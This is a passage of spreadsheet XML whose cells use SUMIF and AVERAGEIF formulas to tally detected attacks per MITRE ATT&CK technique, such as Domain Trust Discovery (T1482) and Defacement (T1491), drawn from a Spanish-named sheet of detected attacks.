        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>37</v>
      </c>
      <c r="AL45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>26</v>
      </c>
      <c r="AM45" s="322" t="str">
        <f t="shared" si="5"/>
        <v>26 (37)</v>
      </c>
      <c r="AN45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>19</v>
      </c>
      <c r="AO45" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>10</v>
      </c>
      <c r="AQ45" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR45" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS45" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT45" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU45" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>8</v>
      </c>
      <c r="AX45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>3</v>
      </c>
      <c r="AY45" s="322" t="str">
        <f t="shared" si="7"/>
        <v>3 (8)</v>
      </c>
      <c r="AZ45" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>3</v>
      </c>
      <c r="BA45" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>1</v>
      </c>
      <c r="BB45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>3</v>
      </c>
      <c r="BC45" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>14</v>
      </c>
      <c r="BD45" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>9</v>
      </c>
      <c r="BE45" s="4" t="str">
        <f t="shared" si="8"/>
        <v>9 (14)</v>
      </c>
      <c r="BF45" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>9</v>
      </c>
      <c r="BG45" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>7</v>
      </c>
      <c r="BI45" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>8</v>
      </c>
      <c r="BJ45" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>7</v>
      </c>
      <c r="BK45" s="322" t="str">
        <f t="shared" si="9"/>
        <v>7 (8)</v>
      </c>
      <c r="BL45" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>2</v>
      </c>
      <c r="BM45" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>7</v>
      </c>
      <c r="BO45" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>20</v>
      </c>
      <c r="BP45" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>17</v>
      </c>
      <c r="BQ45" s="4" t="str">
        <f t="shared" si="10"/>
        <v>17 (20)</v>
      </c>
      <c r="BR45" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>2</v>
      </c>
      <c r="BS45" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>6</v>
      </c>
      <c r="BT45" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU45" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B45,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>11</v>
      </c>
      <c r="BV45" s="292">
        <v>6</v>
      </c>
      <c r="BW45" s="322">
        <v>6</v>
      </c>
      <c r="BX45" s="4" t="str">
        <f t="shared" si="11"/>
        <v>6 (6)</v>
      </c>
      <c r="BY45" s="12">
        <v>1</v>
      </c>
      <c r="BZ45" s="13">
        <v>1</v>
      </c>
      <c r="CA45" s="394">
        <v>6</v>
      </c>
      <c r="CB45" s="288">
        <v>12</v>
      </c>
      <c r="CC45" s="4">
        <v>12</v>
      </c>
      <c r="CD45" s="4" t="str">
        <f t="shared" si="12"/>
        <v>12 (12)</v>
      </c>
      <c r="CE45" s="4">
        <v>1</v>
      </c>
      <c r="CF45" s="4">
        <v>1</v>
      </c>
      <c r="CG45" s="13">
        <v>1</v>
      </c>
      <c r="CH45" s="394">
        <v>6</v>
      </c>
    </row>
    <row r="46" spans="1:86" ht="15" customHeight="1">
      <c r="A46" s="4">
        <f t="shared" si="13"/>
        <v>44</v>
      </c>
      <c r="B46" s="4" t="str">
        <f>IFERROR(VLOOKUP(A46,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1482</v>
      </c>
      <c r="C46" s="493" t="str">
        <f>IFERROR(VLOOKUP(B46,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Domain Trust Discovery</v>
      </c>
      <c r="D46" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B46)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E46" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>4</v>
      </c>
      <c r="F46" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (4)</v>
      </c>
      <c r="G46" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>2</v>
      </c>
      <c r="H46" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>2</v>
      </c>
      <c r="I46" s="322" t="str">
        <f t="shared" si="0"/>
        <v>2 (2)</v>
      </c>
      <c r="J46" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>2</v>
      </c>
      <c r="K46" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M46" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>0</v>
      </c>
      <c r="N46" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>0</v>
      </c>
      <c r="O46" s="322" t="str">
        <f t="shared" si="1"/>
        <v>0 (0)</v>
      </c>
      <c r="P46" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>0</v>
      </c>
      <c r="Q46" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>0</v>
      </c>
      <c r="R46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>0</v>
      </c>
      <c r="S46" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>2</v>
      </c>
      <c r="T46" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>2</v>
      </c>
      <c r="U46" s="4" t="str">
        <f t="shared" si="2"/>
        <v>2 (2)</v>
      </c>
      <c r="V46" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="W46" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>5</v>
      </c>
      <c r="Z46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>4</v>
      </c>
      <c r="AA46" s="322" t="str">
        <f t="shared" si="3"/>
        <v>4 (5)</v>
      </c>
      <c r="AB46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>2</v>
      </c>
      <c r="AC46" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>3</v>
      </c>
      <c r="AE46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>4</v>
      </c>
      <c r="AF46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>2</v>
      </c>
      <c r="AG46" s="322" t="str">
        <f t="shared" si="4"/>
        <v>2 (4)</v>
      </c>
      <c r="AH46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AB$3:$AB$112)</f>
        <v>2</v>
      </c>
      <c r="AI46" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AD$3:$AD$112)</f>
        <v>1</v>
      </c>
      <c r="AJ46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AC$3:$AC$112)</f>
        <v>1</v>
      </c>
      <c r="AK46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AE$3:AE$112)</f>
        <v>9</v>
      </c>
      <c r="AL46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AF$3:AF$112)</f>
        <v>6</v>
      </c>
      <c r="AM46" s="322" t="str">
        <f t="shared" si="5"/>
        <v>6 (9)</v>
      </c>
      <c r="AN46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AG$3:$AG$112)</f>
        <v>5</v>
      </c>
      <c r="AO46" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AI$3:$AI$112)</f>
        <v>1</v>
      </c>
      <c r="AP46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AH$3:$AH$112)</f>
        <v>3</v>
      </c>
      <c r="AQ46" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AJ$3:AJ$112)</f>
        <v>0</v>
      </c>
      <c r="AR46" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AK$3:AK$112)</f>
        <v>0</v>
      </c>
      <c r="AS46" s="322" t="str">
        <f t="shared" si="6"/>
        <v>0 (0)</v>
      </c>
      <c r="AT46" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AL$3:$AL$112)</f>
        <v>0</v>
      </c>
      <c r="AU46" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AN$3:$AN$112)</f>
        <v>0</v>
      </c>
      <c r="AV46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AM$3:$AM$112)</f>
        <v>0</v>
      </c>
      <c r="AW46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AO$3:AO$112)</f>
        <v>0</v>
      </c>
      <c r="AX46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AP$3:AP$112)</f>
        <v>0</v>
      </c>
      <c r="AY46" s="322" t="str">
        <f t="shared" si="7"/>
        <v>0 (0)</v>
      </c>
      <c r="AZ46" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AQ$3:$AQ$112)</f>
        <v>0</v>
      </c>
      <c r="BA46" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AS$3:$AS$112)</f>
        <v>0</v>
      </c>
      <c r="BB46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AR$3:$AR$112)</f>
        <v>0</v>
      </c>
      <c r="BC46" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AT$3:AT$112)</f>
        <v>2</v>
      </c>
      <c r="BD46" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AU$3:AU$112)</f>
        <v>2</v>
      </c>
      <c r="BE46" s="4" t="str">
        <f t="shared" si="8"/>
        <v>2 (2)</v>
      </c>
      <c r="BF46" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AV$3:$AV$112)</f>
        <v>2</v>
      </c>
      <c r="BG46" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AX$3:$AX$112)</f>
        <v>1</v>
      </c>
      <c r="BH46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$AW$3:$AW$112)</f>
        <v>1</v>
      </c>
      <c r="BI46" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AY$3:AY$112)</f>
        <v>5</v>
      </c>
      <c r="BJ46" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!AZ$3:AZ$112)</f>
        <v>3</v>
      </c>
      <c r="BK46" s="322" t="str">
        <f t="shared" si="9"/>
        <v>3 (5)</v>
      </c>
      <c r="BL46" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!BA$3:BA$112)</f>
        <v>1</v>
      </c>
      <c r="BM46" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$BC$3:$BC$112)</f>
        <v>1</v>
      </c>
      <c r="BN46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$BB$3:$BB$112)</f>
        <v>3</v>
      </c>
      <c r="BO46" s="288">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!BD$3:BD$112)</f>
        <v>7</v>
      </c>
      <c r="BP46" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!BE$3:BE$112)</f>
        <v>5</v>
      </c>
      <c r="BQ46" s="4" t="str">
        <f t="shared" si="10"/>
        <v>5 (7)</v>
      </c>
      <c r="BR46" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!BF$3:BF$112)</f>
        <v>1</v>
      </c>
      <c r="BS46" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!BG$3:BG$112)</f>
        <v>2</v>
      </c>
      <c r="BT46" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$BI$3:$BI$112)</f>
        <v>1</v>
      </c>
      <c r="BU46" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B46,'Tabla 2 - Ataques detec (Imple)'!$BH$3:$BH$112)</f>
        <v>4</v>
      </c>
      <c r="BV46" s="292">
        <v>1</v>
      </c>
      <c r="BW46" s="322">
        <v>1</v>
      </c>
      <c r="BX46" s="4" t="str">
        <f t="shared" si="11"/>
        <v>1 (1)</v>
      </c>
      <c r="BY46" s="12">
        <v>1</v>
      </c>
      <c r="BZ46" s="13">
        <v>1</v>
      </c>
      <c r="CA46" s="394">
        <v>1</v>
      </c>
      <c r="CB46" s="288">
        <v>2</v>
      </c>
      <c r="CC46" s="4">
        <v>2</v>
      </c>
      <c r="CD46" s="4" t="str">
        <f t="shared" si="12"/>
        <v>2 (2)</v>
      </c>
      <c r="CE46" s="4">
        <v>1</v>
      </c>
      <c r="CF46" s="4">
        <v>1</v>
      </c>
      <c r="CG46" s="13">
        <v>1</v>
      </c>
      <c r="CH46" s="394">
        <v>1</v>
      </c>
    </row>
    <row r="47" spans="1:86" ht="15" customHeight="1">
      <c r="A47" s="4">
        <f t="shared" si="13"/>
        <v>45</v>
      </c>
      <c r="B47" s="4" t="str">
        <f>IFERROR(VLOOKUP(A47,'Tabla 2 - Ataques detec (Imple)'!$B$3:$D$112,3,FALSE),"")</f>
        <v>T1491</v>
      </c>
      <c r="C47" s="493" t="str">
        <f>IFERROR(VLOOKUP(B47,Techniques!$B$3:$H$213,2,FALSE),"")</f>
        <v>Defacement</v>
      </c>
      <c r="D47" s="493">
        <f>SUMPRODUCT(
  ('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112=$B47)*
  (LEN('Tabla 2 - Ataques detec (Imple)'!$C$3:$C$112)&gt;0)
)</f>
        <v>1</v>
      </c>
      <c r="E47" s="493">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$E$3:$E$112)</f>
        <v>12</v>
      </c>
      <c r="F47" s="579" t="str">
        <f t="shared" si="14"/>
        <v>1 (12)</v>
      </c>
      <c r="G47" s="292">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!F$3:F$112)</f>
        <v>5</v>
      </c>
      <c r="H47" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!G$3:G$112)</f>
        <v>1</v>
      </c>
      <c r="I47" s="322" t="str">
        <f t="shared" si="0"/>
        <v>1 (5)</v>
      </c>
      <c r="J47" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$H$3:$H$112)</f>
        <v>1</v>
      </c>
      <c r="K47" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$J$3:$J$112)</f>
        <v>1</v>
      </c>
      <c r="L47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$I$3:$I$112)</f>
        <v>1</v>
      </c>
      <c r="M47" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!K$3:K$112)</f>
        <v>2</v>
      </c>
      <c r="N47" s="322">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!L$3:L$112)</f>
        <v>2</v>
      </c>
      <c r="O47" s="322" t="str">
        <f t="shared" si="1"/>
        <v>2 (2)</v>
      </c>
      <c r="P47" s="12">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$M$3:$M$112)</f>
        <v>2</v>
      </c>
      <c r="Q47" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$O$3:$O$112)</f>
        <v>1</v>
      </c>
      <c r="R47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$N$3:$N$112)</f>
        <v>1</v>
      </c>
      <c r="S47" s="409">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!P$3:P$112)</f>
        <v>7</v>
      </c>
      <c r="T47" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!Q$3:Q$112)</f>
        <v>3</v>
      </c>
      <c r="U47" s="4" t="str">
        <f t="shared" si="2"/>
        <v>3 (7)</v>
      </c>
      <c r="V47" s="4">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="W47" s="13">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$T$3:$T$112)</f>
        <v>1</v>
      </c>
      <c r="X47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$S$3:$S$112)</f>
        <v>1</v>
      </c>
      <c r="Y47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!U$3:U$112)</f>
        <v>18</v>
      </c>
      <c r="Z47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!V$3:V$112)</f>
        <v>5</v>
      </c>
      <c r="AA47" s="322" t="str">
        <f t="shared" si="3"/>
        <v>5 (18)</v>
      </c>
      <c r="AB47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$R$3:$R$112)</f>
        <v>3</v>
      </c>
      <c r="AC47" s="16">
        <f>AVERAGEIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$Y$3:$Y$112)</f>
        <v>1</v>
      </c>
      <c r="AD47" s="394">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!$X$3:$X$112)</f>
        <v>4</v>
      </c>
      <c r="AE47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!Z$3:Z$112)</f>
        <v>7</v>
      </c>
      <c r="AF47" s="392">
        <f>SUMIF('Tabla 2 - Ataques detec (Imple)'!$D$3:$D$112,$B47,'Tabla 2 - Ataques detec (Imple)'!AA$3:AA$112)</f>
        <v>5</v>
      </c>
      <c r="AG47" s="322" t="str">
        <f t="shared" si="4"/>
        <v>5 (7)</v>
